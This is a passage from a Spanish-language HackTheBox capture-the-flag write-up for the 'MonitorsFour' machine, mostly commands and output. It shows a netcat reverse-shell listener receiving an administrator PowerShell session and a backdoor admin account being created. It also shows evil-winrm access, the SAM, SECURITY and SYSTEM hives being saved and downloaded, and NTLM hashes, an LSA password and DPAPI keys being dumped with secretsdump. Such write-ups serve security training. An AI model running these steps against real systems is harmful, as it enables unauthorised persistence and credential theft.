</span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ rlwrap nc -lvp <span class="m">5555</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">5555</span> ... </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.14.26<span class="o">]</span> from monitorsfour.htb <span class="o">[</span>10.129.45.249<span class="o">]</span> <span class="m">61441</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\W</span>INDOWS<span class="se">\s</span>ystem32&gt; whoami </span></span><span class="line"><span class="cl">monitorsfour<span class="se">\a</span>dministrator </span></span><span class="line"><span class="cl">PS C:<span class="se">\W</span>INDOWS<span class="se">\s</span>ystem32&gt; <span class="nb">cd</span> C:/users/administrator/desktop </span></span><span class="line"><span class="cl">PS C:<span class="se">\u</span>sers<span class="se">\a</span>dministrator<span class="se">\d</span>esktop&gt; dir </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Directory: C:<span class="se">\u</span>sers<span class="se">\a</span>dministrator<span class="se">\d</span>esktop </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Mode LastWriteTime Length Name </span></span><span class="line"><span class="cl">---- ------------- ------ ---- </span></span><span class="line"><span class="cl">-ar--- 12/6/2025 2:31 PM <span class="m">34</span> root.txt </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\u</span>sers<span class="se">\a</span>dministrator<span class="se">\d</span>esktop&gt; cat root.txt </span></span><span class="line"><span class="cl">9ab22c7d0b315b476d2a05261b414a0d </span></span><span class="line"><span class="cl">PS C:<span class="se">\u</span>sers<span class="se">\a</span>dministrator<span class="se">\d</span>esktop&gt; </span></span></code></pre></td></tr></table> </div> </div><h1 id="dump-hashes">Dump Hashes</h1> <p>Creamos un usuario y lo agregamos al grupo <code>Administrators</code> y <code>Remote Management Users</code>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="nv">$Password</span> <span class="o">=</span> ConvertTo-SecureString <span class="s2">&#34;StrongPassword123!&#34;</span> -AsPlainText -Force </span></span><span class="line"><span class="cl">New-LocalUser -Name <span class="s2">&#34;sckull&#34;</span> -Password <span class="nv">$Password</span> </span></span><span class="line"><span class="cl">Add-LocalGroupMember -Group <span class="s2">&#34;Administrators&#34;</span> -Member <span class="s2">&#34;sckull&#34;</span> </span></span><span class="line"><span class="cl">Add-LocalGroupMember -Group <span class="s2">&#34;Remote Management Users&#34;</span> -Member <span class="s2">&#34;sckull&#34;</span> </span></span></code></pre></td></tr></table> </div> </div><p>Verificamos los grupos.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">PS C:<span class="se">\&gt;</span> net user sckull </span></span><span class="line"><span class="cl">User name sckull </span></span><span class="line"><span class="cl">Full Name </span></span><span class="line"><span class="cl">Comment </span></span><span class="line"><span class="cl">User<span class="err">&#39;</span>s comment </span></span><span class="line"><span class="cl">Country/region code <span class="m">000</span> <span class="o">(</span>System Default<span class="o">)</span> </span></span><span class="line"><span class="cl">Account active Yes </span></span><span class="line"><span class="cl">Account expires Never </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Password last <span class="nb">set</span> 12/6/2025 11:58:51 PM </span></span><span class="line"><span class="cl">Password expires 1/17/2026 11:58:51 PM </span></span><span class="line"><span class="cl">Password changeable 12/6/2025 11:58:51 PM </span></span><span class="line"><span class="cl">Password required No </span></span><span class="line"><span class="cl">User may change password Yes </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Workstations allowed All </span></span><span class="line"><span class="cl">Logon script </span></span><span class="line"><span class="cl">User profile </span></span><span class="line"><span class="cl">Home directory </span></span><span class="line"><span class="cl">Last logon Never </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Logon hours allowed All </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Local Group Memberships *Administrators *Remote Management Use </span></span><span class="line"><span class="cl">Global Group memberships *None </span></span><span class="line"><span class="cl">The <span class="nb">command</span> completed successfully. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\&gt;</span> </span></span></code></pre></td></tr></table> </div> </div><p><code>evil-winrm-py</code> nos permitio el acceso a la maquina.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ evil-winrm-py -u sckull -p <span class="s1">&#39;StrongPassword123!&#39;</span> -i monitorsfour.htb </span></span><span class="line"><span class="cl"> _ _ _ </span></span><span class="line"><span class="cl"> _____ _<span class="o">(</span>_<span class="p">|</span> <span class="p">|</span>_____ __ _<span class="o">(</span>_<span class="o">)</span>_ _ _ _ _ __ ___ _ __ _ _ </span></span><span class="line"><span class="cl"> / -_<span class="se">\ </span>V <span class="p">|</span> <span class="p">|</span> <span class="p">|</span>___<span class="se">\ </span>V V <span class="p">|</span> <span class="p">|</span> <span class="s1">&#39; \| &#39;</span>_<span class="p">|</span> <span class="s1">&#39; |___| &#39;</span>_ <span class="p">|</span> <span class="o">||</span> <span class="p">|</span> </span></span><span class="line"><span class="cl"> <span class="se">\_</span>__<span class="p">|</span><span class="se">\_</span>/<span class="p">|</span>_<span class="p">|</span>_<span class="p">|</span> <span class="se">\_</span>/<span class="se">\_</span>/<span class="p">|</span>_<span class="p">|</span>_<span class="o">||</span>_<span class="p">|</span>_<span class="p">|</span> <span class="p">|</span>_<span class="p">|</span>_<span class="p">|</span>_<span class="p">|</span> <span class="p">|</span> .__/<span class="se">\_</span>, <span class="p">|</span> </span></span><span class="line"><span class="cl"> <span class="p">|</span>_<span class="p">|</span> <span class="p">|</span>__/ v1.5.0 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Connecting to <span class="s1">&#39;monitorsfour.htb:5985&#39;</span> as <span class="s1">&#39;sckull&#39;</span> </span></span><span class="line"><span class="cl">evil-winrm-py PS C:<span class="se">\U</span>sers<span class="se">\s</span>ckull<span class="se">\D</span>ocuments&gt; whoami </span></span><span class="line"><span class="cl">monitorsfour<span class="se">\s</span>ckull </span></span><span class="line"><span class="cl">evil-winrm-py PS C:<span class="se">\U</span>sers<span class="se">\s</span>ckull<span class="se">\D</span>ocuments&gt; whoami /priv </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PRIVILEGES INFORMATION </span></span><span class="line"><span class="cl">---------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Privilege Name Description <span class="nv">State</span> </span></span><span class="line"><span class="cl"><span class="o">=========================================</span> <span class="o">==================================================================</span> <span class="o">=======</span> </span></span><span class="line"><span class="cl">SeIncreaseQuotaPrivilege Adjust memory quotas <span class="k">for</span> a process Enabled </span></span><span class="line"><span class="cl">SeSecurityPrivilege Manage auditing and security log Enabled </span></span><span class="line"><span class="cl">SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled </span></span><span class="line"><span class="cl">SeLoadDriverPrivilege Load and unload device drivers Enabled </span></span><span class="line"><span class="cl">SeSystemProfilePrivilege Profile system performance Enabled </span></span><span class="line"><span class="cl">SeSystemtimePrivilege Change the system <span class="nb">time</span> Enabled </span></span><span class="line"><span class="cl">SeProfileSingleProcessPrivilege Profile single process Enabled </span></span><span class="line"><span class="cl">SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled </span></span><span class="line"><span class="cl">SeCreatePagefilePrivilege Create a pagefile Enabled </span></span><span class="line"><span class="cl">SeBackupPrivilege Back up files and directories Enabled </span></span><span class="line"><span class="cl">SeRestorePrivilege Restore files and directories Enabled </span></span><span class="line"><span class="cl">SeShutdownPrivilege Shut down the system Enabled </span></span><span class="line"><span class="cl">SeDebugPrivilege Debug programs Enabled </span></span><span class="line"><span class="cl">SeSystemEnvironmentPrivilege Modify firmware environment values Enabled </span></span><span class="line"><span class="cl">SeChangeNotifyPrivilege Bypass traverse checking Enabled </span></span><span class="line"><span class="cl">SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled </span></span><span class="line"><span class="cl">SeUndockPrivilege Remove computer from docking station Enabled </span></span><span class="line"><span class="cl">SeManageVolumePrivilege Perform volume maintenance tasks Enabled </span></span><span class="line"><span class="cl">SeImpersonatePrivilege Impersonate a client after authentication Enabled </span></span><span class="line"><span class="cl">SeCreateGlobalPrivilege Create global objects Enabled </span></span><span class="line"><span class="cl">SeIncreaseWorkingSetPrivilege Increase a process working <span class="nb">set</span> Enabled </span></span><span class="line"><span class="cl">SeTimeZonePrivilege Change the <span class="nb">time</span> zone Enabled </span></span><span class="line"><span class="cl">SeCreateSymbolicLinkPrivilege Create symbolic links Enabled </span></span><span class="line"><span class="cl">SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token <span class="k">for</span> another user in the same session Enabled </span></span><span class="line"><span class="cl">evil-winrm-py PS C:<span class="se">\U</span>sers<span class="se">\s</span>ckull<span class="se">\D</span>ocuments&gt; </span></span></code></pre></td></tr></table> </div> </div><p>Realizamos una copia de SYSTEM, SECURITY y SAM.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">evil-winrm-py PS C:<span class="se">\U</span>sers<span class="se">\s</span>ckull<span class="se">\D</span>ocuments&gt; reg save HKLM<span class="se">\S</span>YSTEM SYSTEM </span></span><span class="line"><span class="cl">The operation completed successfully. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">evil-winrm-py PS C:<span class="se">\U</span>sers<span class="se">\s</span>ckull<span class="se">\D</span>ocuments&gt; reg save HKLM<span class="se">\S</span>ECURITY SECURITY </span></span><span class="line"><span class="cl">The operation completed successfully. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">evil-winrm-py PS C:<span class="se">\U</span>sers<span class="se">\s</span>ckull<span class="se">\D</span>ocuments&gt; reg save HKLM<span class="se">\S</span>AM SAM </span></span><span class="line"><span class="cl">The operation completed successfully. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">evil-winrm-py PS C:<span class="se">\U</span>sers<span class="se">\s</span>ckull<span class="se">\D</span>ocuments&gt; download SAM SAM </span></span><span class="line"><span class="cl">Downloading C:<span class="se">\U</span>sers<span class="se">\s</span>ckull<span class="se">\D</span>ocuments<span class="se">\S</span>AM: 128kB <span class="o">[</span>00:00, 710MB/s<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> File downloaded successfully and saved as: /home/kali/htb/monitorsfour/SAM </span></span><span class="line"><span class="cl">evil-winrm-py PS C:<span class="se">\U</span>sers<span class="se">\s</span>ckull<span class="se">\D</span>ocuments&gt; download SECURITY SECURITY </span></span><span class="line"><span class="cl">Downloading C:<span class="se">\U</span>sers<span class="se">\s</span>ckull<span class="se">\D</span>ocuments<span class="se">\S</span>ECURITY: 64.0kB <span class="o">[</span>00:00, 477MB/s<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> File downloaded successfully and saved as: /home/kali/htb/monitorsfour/SECURITY </span></span><span class="line"><span class="cl">evil-winrm-py PS C:<span class="se">\U</span>sers<span class="se">\s</span>ckull<span class="se">\D</span>ocuments&gt; download SYSTEM SYSTEM </span></span><span class="line"><span class="cl">Downloading C:<span class="se">\U</span>sers<span class="se">\s</span>ckull<span class="se">\D</span>ocuments<span class="se">\S</span>YSTEM: 16.9MB <span class="o">[</span>00:14, 1.22MB/s<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> File downloaded successfully and saved as: /home/kali/htb/monitorsfour/SYSTEM </span></span><span class="line"><span class="cl">evil-winrm-py PS C:<span class="se">\U</span>sers<span class="se">\s</span>ckull<span class="se">\D</span>ocuments&gt; </span></span></code></pre></td></tr></table> </div> </div><p>Localmente obtuvimos los hashes de todos los usuarios.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ impacket-secretsdump -system SYSTEM -security SECURITY -sam SAM LOCAL </span></span><span class="line"><span class="cl">Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Target system bootKey: 0x8a6c03715ce8a8d26720e83ffe01c780 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Dumping <span class="nb">local</span> SAM hashes <span class="o">(</span>uid:rid:lmhash:nthash<span class="o">)</span> </span></span><span class="line"><span class="cl">Administrator:500:aad3b435b51404eeaad3b435b51404ee:41f4136faf5a06a6765a8fcea8870225::: </span></span><span class="line"><span class="cl">Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: </span></span><span class="line"><span class="cl">DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: </span></span><span class="line"><span class="cl">WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: </span></span><span class="line"><span class="cl">marcus:1001:aad3b435b51404eeaad3b435b51404ee:a42896a092c80b3383da80bc3c400330::: </span></span><span class="line"><span class="cl">sckull:1002:aad3b435b51404eeaad3b435b51404ee:ccad9cd271d517d14d1950b6a317ba1e::: </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Dumping cached domain logon information <span class="o">(</span>domain/username:hash<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Dumping LSA Secrets </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> DefaultPassword </span></span><span class="line"><span class="cl"><span class="o">(</span>Unknown User<span class="o">)</span>:817mkh27zdp6! </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> DPAPI_SYSTEM </span></span><span class="line"><span class="cl">dpapi_machinekey:0x48249fb0f4cf23ecbef54affc2b21d65717bf7df </span></span><span class="line"><span class="cl">dpapi_userkey:0xb8820f0412fc851cca8aa426248e7f37af5dd0b2 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> NL<span class="nv">$KM</span> </span></span><span class="line"><span class="cl"> <span class="m">0000</span> FA <span class="m">36</span> C7 D5 C0 <span class="m">82</span> AB B5 <span class="m">78</span> E1 <span class="m">17</span> F0 5E <span class="m">36</span> <span class="m">13</span> 5B .6......x...^6.<span class="o">[</span> </span></span><span class="line"><span class="cl"> <span class="m">0010</span> A5 9F C0 9C <span class="m">38</span> A8 C4 <span class="m">34</span> FE <span class="m">20</span> F7 2B D9 A2 8C AF ....8..4. .+.... </span></span><span class="line"><span class="cl"> <span class="m">0020</span> <span class="m">71</span> F2 E0 D2 <span class="m">09</span> A1 EC <span class="m">09</span> EB DE 9B 8C F5 4A E6 2D q............J.- </span></span><span class="line"><span class="cl"> <span class="m">0030</span> 6B 1D <span class="m">32</span> <span class="m">16</span> A2 ED B4 AE F1 <span class="m">51</span> AE 5B <span class="m">41</span> E5 4E B6 k.2......Q.<span class="o">[</span>A.N. </span></span><span class="line"><span class="cl">NL<span class="nv">$KM</span>:fa36c7d5c082abb578e117f05e36135ba59fc09c38a8c434fe20f72bd9a28caf71f2e0d209a1ec09ebde9b8cf54ae62d6b1d3216a2edb4aef151ae5b41e54eb6 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Cleaning up... </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div> sckull featured image meta image ffuf api-enum cacti cacti-1.2.28 CVE-2025-24367 password-spraying CVE-2025-24367 docker CVE-2025-9074 Docker-Desktop-4.44.2 chisel evil-winrm-py secretsdump hackthebox linux